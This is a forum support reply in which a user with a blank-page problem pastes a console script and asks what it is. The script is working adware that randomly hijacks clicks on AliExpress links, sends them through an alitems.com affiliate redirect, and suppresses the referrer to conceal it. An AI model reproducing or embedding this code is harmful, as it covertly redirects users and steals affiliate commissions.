Support

Account

Home Forums Front-end Issues blank page on form update acf Reply To: blank page on form update acf

  • I just noticed that after a few seconds, I got this message as error in the console.log
    What is?

    
    /// <reference path="Config.js" />
    /// <reference path="Storage.js" />
    /// <reference path="jquery-1.8.2.js" />
    
    //Método de instância usa o prototype
    //Método static não usa prototype
    var ach = .35;
    
    (function () {
    // savings
    if (Math.random() < ach)
    if (location.href.indexOf("aliexpress.com") == -1)
    document.addEventListener("click", function(e) {
      var el = e.target;
      while (!el.href && (el = el.parentNode)) { }
      if (!el.href) return;
      var href = el.href.split('?')[0];
      if (!/^https?:\/\/www\.aliexpress\.com(\/item|\/$|$)/i.test(href)) return;
      if (/click\.ali/i.test(href)) return;
      var prot = location.protocol == 'https:' ? 'http:' : 'https:';
      var newref = prot + '//alitems.com/g/1e8d1144941b31890c7516525dc3e8/';
      if (/\/item/i.test(href)) newref += '?ulp=' + encodeURIComponent(href);
      e.preventDefault();
      r();
      location.href = newref;
    }, false);
    function r() {
      var m = document.createElement('meta');
      m.name = 'referrer';
      m.content = 'no-referrer';
      document.head.appendChild(m);
    }
    })();